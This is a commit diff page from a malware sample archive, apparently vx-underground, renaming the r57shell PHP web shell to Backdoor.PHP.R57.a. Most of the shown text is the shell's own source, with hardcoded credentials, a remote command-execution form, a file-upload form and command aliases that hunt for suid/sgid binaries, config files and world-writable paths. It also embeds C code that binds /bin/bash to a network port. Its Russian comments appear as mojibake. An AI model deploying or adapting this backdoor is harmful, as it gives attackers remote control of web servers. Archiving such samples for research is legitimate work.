Skip to content
Snippets Groups Projects
Unverified Commit def1cb17 authored by vxunderground's avatar vxunderground Committed by GitHub
Browse files

Rename Backdoor.PHP.Rst.am to Backdoor.PHP.R57.a

parent 772532d0
No related branches found
No related tags found
No related merge requests found
...@@ -10,33 +10,33 @@ ...@@ -10,33 +10,33 @@
/* /*
/* SPECIAL xbIx birthday edition /* SPECIAL xbIx birthday edition
/* /*
/* r57shell.php - /* r57shell.php - ñêðèïò íà ïõï ïîçâîëÿþùèé âàì âûïîëíÿòü øåëë êîìàíäû íà ñåðâåðå ÷åðåç áðàóçåð
/* : http://rst.void.ru www.rsteam.ru /* Âû ìîæåòå ñêà÷àòü íîâóþ âåðñèþ íà íàøåì ñàéòå: http://rst.void.ru èëè www.rsteam.ru
/* 1.0 beta ( ... ... ) /* Âåðñèÿ 1.0 beta (ïèñàëàñü ïðàêòè÷åñêè íà êîëåíêå... òàê ÷òî êîä ñûðîâàò... äëÿ òåñòèðîâàíèÿ)
/* /*
/* : /* Âîçìîæíîñòè:
/* ~ /* ~ çàùèòà ñêðèïòà ñ ïîìîùüþ ïàðîëÿ
/* ~ - /* ~ âûïîëíåíèå øåëë-êîìàíä
/* ~ /* ~ çàãðóçêà ôàéëîâ íà ñåðâåð
/* ~ /* ~ ïîääåðæèâàåò àëèàñû êîìàíä
/* ~ 4 : /* ~ âêëþ÷åíû 4 àëèàñà êîìàíä:
/* - suid /* - ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñ suid áèòîì
/* - sgid /* - ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñ sgid áèòîì
/* - config.inc.php /* - ïîèñê íà ñåðâåðå ôàéëîâ config.inc.php
/* - /* - ïîèñê íà ñåðâåðå âñåõ äèðåêòîðèé è ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ
/* ~ : , /* ~ äâà ÿçûêà èíòåðôåéñà: ðóññêèé, àíãëèéñêèé
/* ~ /bin/bash /* ~ âîçìîæíîñòü çàáèíäèòü /bin/bash íà îïðåäåëåííûé ïîðò
/* /*
/* 05.03.2004 (c) RusH security team /* 05.03.2004 (c) RusH security team
/* /*
/******************************************************************************************************/ /******************************************************************************************************/
## ## Àóòåíòèôèêàöèÿ
## ## Ëîãèí è ïàðîëü äëÿ äîñòóïà ê ñêðèïòó
## !!! ## ÍÅ ÇÀÁÓÄÜÒÅ ÑÌÅÍÈÒÜ ÏÅÐÅÄ ÐÀÇÌÅÙÅÍÈÅÌ ÍÀ ÑÅÐÂÅÐÅ!!!
$name="r57"; ## $name="r57"; ## ëîãèí ïîëüçîâàòåëÿ
$pass="r57"; ## $pass="r57"; ## ïàðîëü ïîëüçîâàòåëÿ
if(!isset($PHP_AUTH_USER)) if(!isset($PHP_AUTH_USER))
{ {
...@@ -59,28 +59,28 @@ set_time_limit(0); ...@@ -59,28 +59,28 @@ set_time_limit(0);
/* /*
Âûáîð ÿçûêà
$language='ru' - $language='ru' - ðóññêèé
$language='eng' - $language='eng' - àíãëèéñêèé
*/ */
$language='ru'; $language='ru';
$lang=array( $lang=array(
'ru_text1' => ' ', 'ru_text1' => 'Âûïîëíåííàÿ êîìàíäà',
'ru_text2' => ' ', 'ru_text2' => 'Âûïîëíåíèå êîìàíä íà ñåðâåðå',
'ru_text3' => ' ', 'ru_text3' => 'Âûïîëíèòü êîìàíäó',
'ru_text4' => ' ', 'ru_text4' => 'Ðàáî÷àÿ äèðåêòîðèÿ',
'ru_text5' => ' ', 'ru_text5' => 'Çàãðóçêà ôàéëîâ íà ñåðâåð',
'ru_text6' => ' ', 'ru_text6' => 'Ëîêàëüíûé ôàéë',
'ru_text7' => '', 'ru_text7' => 'Àëèàñû',
'ru_text8' => ' ', 'ru_text8' => 'Âûáåðèòå àëèàñ',
'ru_butt1' => '', 'ru_butt1' => 'Âûïîëíèòü',
'ru_butt2' => '', 'ru_butt2' => 'Çàãðóçèòü',
'ru_text9' => ' /bin/bash', 'ru_text9' => 'Îòêðûòèå ïîðòà è ïðèâÿçêà åãî ê /bin/bash',
'ru_text10' => ' ', 'ru_text10' => 'Îòêðûòü ïîðò',
'ru_text11' => ' ', 'ru_text11' => 'Ïàðîëü äëÿ äîñòóïà',
'ru_butt3' => '', 'ru_butt3' => 'Îòêðûòü',
'eng_text1' => 'Executed command', 'eng_text1' => 'Executed command',
'eng_text2' => 'Execute command on server', 'eng_text2' => 'Execute command on server',
...@@ -101,22 +101,22 @@ $lang=array( ...@@ -101,22 +101,22 @@ $lang=array(
/* /*
Àëèàñû êîìàíä
- . ( ) Ïîçâîëÿþò èçáåæàòü ìíîãîêðàòíîãî íàáîðà îäíèõ è òåõ-æå êîìàíä. ( Ñäåëàíî áëàãîäàðÿ ìîåé ïðèðîäíîé ëåíè )
. Âû ìîæåòå ñàìè äîáàâëÿòü èëè èçìåíÿòü êîìàíäû.
*/ */
$aliases=array( $aliases=array(
/* suid */ /* ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñ suid áèòîì */
'find all suid files' => 'find / -type f -perm -04000 -ls', 'find all suid files' => 'find / -type f -perm -04000 -ls',
/* sgid */ /* ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñ sgid áèòîì */
'find all sgid files' => 'find / -type f -perm -02000 -ls', 'find all sgid files' => 'find / -type f -perm -02000 -ls',
/* config.inc.php */ /* ïîèñê íà ñåðâåðå ôàéëîâ config.inc.php */
'find config.inc.php files' => 'find / -type f -name config.inc.php', 'find config.inc.php files' => 'find / -type f -name config.inc.php',
/* */ /* ïîèñê íà ñåðâåðå âñåõ äèðåêòîðèé è ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ */
'find writable directories and files' => 'find / -perm -2 -ls', 'find writable directories and files' => 'find / -perm -2 -ls',
'----------------------------------------------------------------------------------------------------' => 'ls -la' '----------------------------------------------------------------------------------------------------' => 'ls -la'
); );
...@@ -137,7 +137,7 @@ int sockfd, newfd; ...@@ -137,7 +137,7 @@ int sockfd, newfd;
char buf[30]; char buf[30];
struct sockaddr_in remote; struct sockaddr_in remote;
if(argc < 3) usage(argv[0]); if(argc < 3) usage(argv[0]);
if(fork() == 0) { // if(fork() == 0) { // Îòâåòâëÿåì íîâûé ïðîöåññ
remote.sin_family = AF_INET; remote.sin_family = AF_INET;
remote.sin_port = htons(atoi(argv[1])); remote.sin_port = htons(atoi(argv[1]));
remote.sin_addr.s_addr = htonl(INADDR_ANY); remote.sin_addr.s_addr = htonl(INADDR_ANY);
...@@ -178,7 +178,7 @@ return 0; ...@@ -178,7 +178,7 @@ return 0;
}"; }";
?> ?>
<!-- --> <!-- Çäðàâñòâóé Âàñÿ -->
<html> <html>
<head> <head>
<title>r57shell</title> <title>r57shell</title>
...@@ -322,9 +322,9 @@ echo "</b>"; ...@@ -322,9 +322,9 @@ echo "</b>";
/* command execute form */ /* command execute form */
echo "<form name=command method=post>"; echo "<form name=command method=post>";
echo "<font face=Verdana size=-2>"; echo "<font face=Verdana size=-2>";
echo "<b>&nbsp;".$lang[$language._text3]." <font face=Wingdings color=gray></font>&nbsp;&nbsp;&nbsp;&nbsp;</b>"; echo "<b>&nbsp;".$lang[$language._text3]." <font face=Wingdings color=gray>è</font>&nbsp;&nbsp;&nbsp;&nbsp;</b>";
echo "<input type=text name=cmd size=85>&nbsp;&nbsp;<br>"; echo "<input type=text name=cmd size=85>&nbsp;&nbsp;<br>";
echo "<b>&nbsp;".$lang[$language._text4]." <font face=Wingdings color=gray></font>&nbsp;&nbsp;&nbsp;&nbsp;</b>"; echo "<b>&nbsp;".$lang[$language._text4]." <font face=Wingdings color=gray>è</font>&nbsp;&nbsp;&nbsp;&nbsp;</b>";
if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=text name=dir size=85 value=".exec("pwd").">"; } if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=text name=dir size=85 value=".exec("pwd").">"; }
else { echo "<input type=text name=dir size=85 value=".$_POST['dir'].">"; } else { echo "<input type=text name=dir size=85 value=".$_POST['dir'].">"; }
echo "&nbsp;&nbsp;<input type=submit name=submit value=\" ".$lang[$language._butt1]." \">"; echo "&nbsp;&nbsp;<input type=submit name=submit value=\" ".$lang[$language._butt1]." \">";
...@@ -339,7 +339,7 @@ echo "</form>"; ...@@ -339,7 +339,7 @@ echo "</form>";
/* file upload form */ /* file upload form */
echo "<form name=upload method=POST ENCTYPE=multipart/form-data>"; echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
echo "<font face=Verdana size=-2>"; echo "<font face=Verdana size=-2>";
echo "<b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".$lang[$language._text6]." <font face=Wingdings color=gray></font>&nbsp;&nbsp;&nbsp;&nbsp;</b>"; echo "<b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".$lang[$language._text6]." <font face=Wingdings color=gray>è</font>&nbsp;&nbsp;&nbsp;&nbsp;</b>";
echo "<input type=file name=userfile size=85>&nbsp;"; echo "<input type=file name=userfile size=85>&nbsp;";
if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=hidden name=dir size=85 value=".exec("pwd").">"; } if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=hidden name=dir size=85 value=".exec("pwd").">"; }
else { echo "<input type=hidden name=dir size=85 value=".$_POST['dir'].">"; } else { echo "<input type=hidden name=dir size=85 value=".$_POST['dir'].">"; }
...@@ -355,7 +355,7 @@ echo "</form>"; ...@@ -355,7 +355,7 @@ echo "</form>";
/* aliases form */ /* aliases form */
echo "<form name=aliases method=POST>"; echo "<form name=aliases method=POST>";
echo "<font face=Verdana size=-2>"; echo "<font face=Verdana size=-2>";
echo "<b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".$lang[$language._text8]." <font face=Wingdings color=gray></font>&nbsp;&nbsp;&nbsp;&nbsp;</b>"; echo "<b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".$lang[$language._text8]." <font face=Wingdings color=gray>è</font>&nbsp;&nbsp;&nbsp;&nbsp;</b>";
echo "<select name=alias>"; echo "<select name=alias>";
foreach ($aliases as $alias_name=>$alias_cmd) foreach ($aliases as $alias_name=>$alias_cmd)
{ {
...@@ -378,9 +378,9 @@ echo "</form>"; ...@@ -378,9 +378,9 @@ echo "</form>";
/* port bind form */ /* port bind form */
echo "<form name=bind method=POST>"; echo "<form name=bind method=POST>";
echo "<font face=Verdana size=-2>"; echo "<font face=Verdana size=-2>";
echo "<b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".$lang[$language._text10]." <font face=Wingdings color=gray></font>&nbsp;&nbsp;&nbsp;&nbsp;</b>"; echo "<b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".$lang[$language._text10]." <font face=Wingdings color=gray>è</font>&nbsp;&nbsp;&nbsp;&nbsp;</b>";
echo "<input type=text name=port size=15 value=11457>&nbsp;"; echo "<input type=text name=port size=15 value=11457>&nbsp;";
echo "<b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".$lang[$language._text11]." <font face=Wingdings color=gray></font>&nbsp;&nbsp;&nbsp;&nbsp;</b>"; echo "<b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".$lang[$language._text11]." <font face=Wingdings color=gray>è</font>&nbsp;&nbsp;&nbsp;&nbsp;</b>";
echo "<input type=text name=bind_pass size=15 value=r57>&nbsp;"; echo "<input type=text name=bind_pass size=15 value=r57>&nbsp;";
if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=hidden name=dir size=85 value=".exec("pwd").">"; } if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=hidden name=dir size=85 value=".exec("pwd").">"; }
else { echo "<input type=hidden name=dir size=85 value=".$_POST['dir'].">"; } else { echo "<input type=hidden name=dir size=85 value=".$_POST['dir'].">"; }
......
0% Loading or .
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment